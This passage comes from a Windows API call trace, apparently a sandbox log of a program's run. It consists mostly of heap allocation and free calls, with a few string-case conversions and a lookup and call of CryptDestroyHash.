(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.405] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.406] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.406] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.407] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.407] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0252.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.410] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.410] CryptDestroyHash (hHash=0xaa5660) returned 1 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.418] HeapFree (in: 